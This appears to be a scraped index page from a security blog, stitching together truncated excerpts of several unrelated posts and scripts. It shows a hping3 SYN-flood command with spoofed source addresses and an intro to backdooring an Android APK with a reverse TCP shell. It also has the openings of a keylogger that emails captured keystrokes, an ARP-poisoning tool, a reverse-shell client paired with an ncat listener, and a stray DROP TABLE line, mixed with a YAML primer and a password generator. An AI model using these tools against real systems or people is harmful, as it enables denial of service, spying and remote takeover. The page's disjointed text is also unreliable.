Run the command: hping3 --flood -S -V --rand-source http://stv.com
Where:
--flood send packets as fast as possible-S (Syn packet): legit TCP packet connection-V verbose mode--rand-source randomize the IP source address, like it's requested from different systems (sort of DDoS)
We have to set a point, mobile applications are a HUGE market today. Many entrepreneurs left behind web-based experiences for building disruptive mobile solutions. The battle of smart-phones remains today between IOs and Android. Both have pros and cons, they are designed and configured with default security settings that maybe not the ideal for non-experienced people.
This writing demonstrates a practical and simple example on how to generate a Reverse TCP back-door on an existing APK file.
This is a pretty common "Social Engineering Attack", and it's focused on generating a reverse TCP connection, where the attacker easily can generate shell access to your Android phone in the time you are using the infected application and do some harmful stuff or access your private information without any concern.
And when a mean “Social Engineering Attacks” is because the way it propagates, I’ll explain in a bit how are the
| #!/usr/bin/python | |
| import socket | |
| import struct | |
| # creating a rawSocket for communications | |
| # PF_SOCKET (packet interface), SOCK_RAW (Raw socket) - htons (protocol) 0x08000 = IP Protocol | |
| rawSocket = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.htons(0x0800)) | |
| # deciding interface - packet sniffing and then injection |
In a short note, YAML files represent configuration data in most of the times. According to Wikipedia: YAML "is a human-friendly data serialization standard for all programming languages". Basically we can say that is similar to XML and JSON notation and it is pretty used on DevOps activities for IaC configurations and for sharing data across multiple applications.
key-Value Pair: there's nothing more to say to this. You have a "Key" that acts as an Identification for value itself.
Here's an example:
| from pynput import keyboard | |
| import threading | |
| import smtplib | |
| class KeyLogger: | |
| def __init__(self, time_interval, email, username, password): | |
| self.log = "KeyLogger started" | |
| self.interval = time_interval | |
| self.username = username |
| DROP TABLE [dbo].[Sinventario]; |
| #!/usr/bin/python | |
| from scapy.all import * | |
| import threading | |
| import argparse | |
| import pdb | |
| import sys | |
| import os | |
| class ARPPoisoning(threading.Thread): |
| #!/bin/bash | |
| # getopts -> parameter behavioral options | |
| # this script generates a random password - -l (length), -s (character) | |
| usage() { | |
| echo "Usage: ${0} [-vs] [-l LENGTH]" >%2 | |
| echo "Generate a random password" | |
| echo "-l LENGTH specify the password length" | |
| echo "-s Append a special character to the password" |
| #!/usr/bin/python | |
| ''' | |
| The counterpart is done by: ncat --ssl -vlp 8888 | |
| ''' | |
| import os | |
| import socket | |
| import ssl # for socket wrapper |
| import subprocess, smtplib, os, tempfile, requests | |
| def send_email(email, username, password, message): | |
| # instance | |
| server = smtplib.SMTP("smtp.mailtrap.io", 587) | |
| server.starttls() | |
| server.login(username, password) # login | |
| server.sendmail(email, email, message) # sending message | |
| server.quit() |